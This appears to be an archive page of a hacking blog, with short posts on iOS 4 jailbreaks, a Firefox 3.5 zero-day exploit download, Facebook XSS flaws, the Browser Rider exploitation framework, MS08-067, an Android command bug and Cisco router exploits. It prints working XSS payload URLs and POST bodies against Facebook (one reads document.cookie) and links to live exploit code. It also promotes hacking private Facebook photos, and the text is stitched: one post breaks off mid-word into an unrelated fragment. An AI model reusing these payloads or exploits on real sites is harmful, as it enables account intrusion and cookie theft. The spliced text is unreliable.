Many discussion about jailbreaking iOS4 are crossing the net, some sources say that the previous jailbreak tool spirit doesn’t work anymore. So I guess we have to wait for the newest iOS4 Jailbreak Instructions.

Brief review from emoiz:

The jailbreak tool Spirit which was released by iPhone Dev Team to jailbreak iPad 3G, iPhone OS 3.1.2, 3.1.3, or 3.2 is not working any more with the newly launched iOS 4 which was revealed by Apple few days back at WWDC 2010.
As iH8Sn0w has confirmed that the iOS exploit is filled now so obviously Spirit could not work anymore for jailbreak. So, the users have to wait until the new exploit in iPhone OS will identify in near future to build new jailbreak tool.

Until than stay with us for new instructions about iOS 4 jailbreak.

Related articles by Zemanta

• Official Jailbreak for iPhone 3GS iOS 4 with new Bootrom (crenk.com)
• iPhone 4 Gets Its First “Userland” Jailbreak (macstories.net)
• Complete Guide to Jailbreaking your iPhone (brighthub.com)

Milw0rm is finally back with some new interesting informations and exploits , one of then is Firefox 3.5 Zero Day exploit! the exploit has been published on milw0rm yesterday. The firefox 3.5 zero day exploit itself simply demonstrates a security vulnerability that existed on firefox 3.5 by loading windows calculator. The most preventive way to take is by disabling javascript on firefox 3.5 , otherwise your pcs might get infected!

Excerpt :

The exploit portal Milw0rm has published an exploit for Firefox 3.5. The exploit demonstrates a security vulnerability by starting the Windows calculator. In testing by heise Security, the exploit crashed Firefox under Vista, but security service providers Secunia and VUPEN confirmed that attackers using prepared websites can infect PCs. The cause of the problem is a buffer overflow when processing specially prepared Font tags.

The Mozilla Foundation has been informed about the problem, but so far has not responded to queries by heise Security. An update does not currently exist. So far there are no reports of sites on the internet being first to use the hole for active infections and exploitation of Windows PCs. Since the published exploit uses PC heap spraying under JavaScript, disabling JavaScript should act as a stop gap. When the exploit was tested with Windows 7 RC1, after a short time, the browser displayed a dialogue offering to abort the script.

Download firefox 3.5 zero day Exploit : http://www.milw0rm.com/exploits/9137

Related articles :

• Highly Critical Security Vulnerability Found in Firefox 3. (mashable.com)
• Firefox 3.5 vulnerable to critical Javascript attack (macworld.com)
• Firefox users: critical security vulnerability (consumingexperience.com)

Hacking Facebook Private Photos has become the most wanted stuff nowadays , I don’t know since when people start searching those keywords on Google , and they finally stumbled to this Blog (and unfortunately found nothing on this blog ). Btw , I’m just going to introduce you to facebook view all photos script that can be used to hack facebook private photos of private facebook profile. This is not a crack facebook profile tutorial .

The script to view the facebook private photos itself is based on greasemonkey. And Some features that you will find from this script are :

* Lets y

And of course this xss can used for implementing myspace worm , or even for some advanced myspace hacking or Myspace password hack.

Mirror : http://xssed.com/mirror/57181/

Random articles :

• l0ckergn0me: Windows Vulnerability Scanner v1.29 (via Blog) (lockergnome.com)
• Addicted to Facebook? Your Phone Is Calling (wired.com)
• The Seven Security Pain Points (sciencetext.com)

If I have mentioned some security flaw that Facebook ever faced , like how to view facebook private profile pictures , some another facebook security flaws just have been discovered during the late 2008 until January 2009. And I’m pretty sure there will be more facebook xss hacking in 2009 . Some major facebook xss vulnerabilities has been published on Xssed.com (the most well-known website for xss news). And of course , you’re very allowed to leave this post if you still think Xss is not dangerous at all . Some critical Facebook Xss flaws can infect million facebook members with malware. And it’s not impossible for a new facebook xss worm to be developed under these circumstances.

The first Facebook xss vulnerability was occured on facebook reset password page :
XSS:
http://www.facebook.com/reset.php?locale=en_GB%22%3E%3Cscript%3Ealert(1)%3C/script%3E%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Mirror : http://www.xssed.com/mirror/55951/

The 2nd : (with POST)
https://login.facebook.com/login.php?iphone&next=http%3A%2F%2Fiphone.facebook.com%2F

POST:

email=biz%22%3E%3Cscript%3Ealert%28%27tohellwithgeorgia%27%29%3C%2Fscript%3E%3C%22&pass=greetz2evilghost&next=http%3A%2F%2Fiphone.facebook.com%2F&login=Login

The 3rd :
http://apps.facebook.com/blognetworks/searchpage.php?tag=%22%3E%3Cscript%3Ealert(%22DaiMon%22)%3C/script%3E

The 4th : (with POST)
http://developers.facebook.com/tools.php?fbml

POST:

profile=1299125444&position=wide&api_key=%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+p3lo%3C%2Fh1%3E%3C%2Fmarquee%3E+&fbml=

Random articles :

• Is Facebook Connect a Phisher’s Dream?
• 5 Reasons to Start Using Facebook Connect Now

Image via Wikipedia

Just stumbled across to packet storm security’s tools collection , and I’ve just found an interesting tool to be discussed here , especially if you’re interested in Browser exploitation. The tool itself is called Browser Rider. It’s a hacking framework to build payloads that exploit your browser. Sounds similar to bEEF ? Well , yes it does! the developer’s purpose of developing this tool is to provide you with the more reliable browser hacking framework than just those other unmaintained tools out there nice..

However , here’s the excerpt from their official project site :

Browser Rider is not a new concept. Similar tools such as BeEF or Backframe exploited the same concept. However most of the other existing tools out there are unmainted, not updated and not documented. Browser Rider wants to fill those gaps by providing a better alternative.
What are the features?

^ Easily create powerful payloads and plugins
^ Manage payloads automatically with plugins
^ All data can be saved in a database
^ Obfuscation
^ Polymorphisme
^ Control more than one zombie at a time
^ Simple administration panel
Why create Browser Rider?

› Fun
› The challenge of creating something better than what is already existing
› Browser Rider can be used as a better XSS tunnel than the other tools during a pentest
› General hacking
Technical requirements

› PHP 5, with json installed
› Mysql
› Apache with url_rewrite on
› Targets must have Javascript turned on

You can also try the online demo of Browser Rider by following these steps :
- Open http://ultratopcool.free.fr/xss_remotedomain.html , and do not close it.
- Then go to http://www.engineeringforfun.com/BrowserRiderDemo/ , and you should see your ip in the zombie list

Watch the video & Read more about this project here !

Related article :

• WordPress update kyboshes XSS flaw

Image by Getty Images via Daylife

Since MS08-067 exploit ’s published , there are a lot of mass exploitation to my friend’s workstations which mostly run Windows server 2003 and Windows xp sp2. I think it’s important to patch the vulnerability as soon as possible , just don’t let your workstations get hacked just because of this MS08-67 exploit. You can download ms08-067 exploit patch from Microsoft download center. By downloading and installing the ms06-067 patch , hopefully your workstations won’t be easily get compromised anymore.

Click here to read my previous post about ms08-067 exploit code. And please follow this following link to begin downloading your patch based on your operating system (windows xp/2003/vista/etc) :

http://www.microsoft.com/downloads/results.aspx?pocId=&freetext=ms08-067&DisplayLang=en

Related articles :

• Microsoft to deliver a pair of November fixes
• Microsoft to rush out emergency Windows patch
• Microsoft issues security patch for unreleased software

Image by pipot83 via Flickr

Well this might be the most embarassing security hole that ever existed , the vulnerability comes from Google Android. There are two methods to do the jailbreak to the OS itself. Here’s the short excerpt from cgisecurity about this google android security hole :

“With the news that Google’s Android shipped with an embarrassing security hole being followed by a simple two-step method to ‘jailbreak’ the OS, you’d think that the company had ironed out most of the remaining bugs – but you’d be wrong.

According to ZDnet’s Ed Burnette, the open-source Linux-based smartphone platform recently shipped in T-Mobile’s G1 handset contains a real doozy of a back door: it would appear that absolutely anything you write, at absolutely any time, will be evaluated as a system command.

The bug, which affects handsets running Android 1.0 TC5-RC29 or earlier, can be demonstrated in a simple way: in any text entry box – even on a webpage or in the address book – hit the ‘enter’ key and type ‘reboot’ followed by ‘enter’ again. If your handset is vulnerable, you’ll see it suddenly decide to restart the OS.”

This has to be one of the most bizarre bugs I’ve ever heard of. I can’t imagine a legit business case for this, and I can’t imagine this being a backdoor since most user entered data would error out. TheRegister also has a few amusing things to say.

Related articles :

• Googlephone security team seeks bug hunters
• First Google Android phone to debut next week
• Should IT pros be thinking about Android?
• Google Launches Android, an Open Mobile Platform

Please explore this blog to find out more articles about how to view private friendster profile , friendster password cracker , how to view friendster private photos , webgoat tutorials , and so on

microsoft

I’m sorry if it’s a bit late , but it’s still interesting to digg more about this new exploit. Microsoft released  this security vulnerability information on October 23,2008. The vulnerability itself might causes the attacker to launch remote code execution which could be very harmful.

The affected OS :

Microsoft Windows 2000 Service Pack 4
Windows XP Service Pack 2
Windows XP Service Pack 3
Windows XP Professional x64 Edition
Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 1
Windows Server 2003 Service Pack 2
Windows Server 2003 x64 Edition
Windows Server 2003 x64 Edition Service Pack 2
Windows Server 2003 with SP1 for Itanium-based Systems
Windows Server 2003 with SP2 for Itanium-based Systems
Windows Vista and Windows Vista Service Pack 1
Windows Vista x64 Edition and Windows Vista x64 Edition Service Pack 1
Windows Server 2008 for 32-bit Systems*
Windows Server 2008 for x64-based Systems*
Windows Server 2008 for Itanium-based Systems

You can automate your target scanning by using the script developed by portcullis lab:

http://labs.portcullis.co.uk/application/ms08-067-check/

The real exploit link :

http://www.whitecell.org/list.php?id=61

This is the situation that allows the exploit to work :
1) Tab of Router HTTP Administration Interface is open somewhere on the browser.
2) The session is still active @ Router HTTP Admin Interface.
3) The browser used has the credentials saved (No prompts /w Safari).
4) Nearly any situation where the target visits the page (But if not 1, 2, or 3 a prompt will usually pop up asking for credentials)

Based on his official announcement , there are two exploits available for the exploitation :
Exploit #1 (ciscOWN1.htm):

Exec Mode Commands. Just specify the router’s address and command you want to be executed.

Exploit #2 (ciscOWN2.htm):

Configure Mode Commands. Just specify the router’s address and command you want to be executed.

Here’s the short video which describes the cisco exploitation : http://video.google.com/videoplay?docid=1038241899942867502&hl=en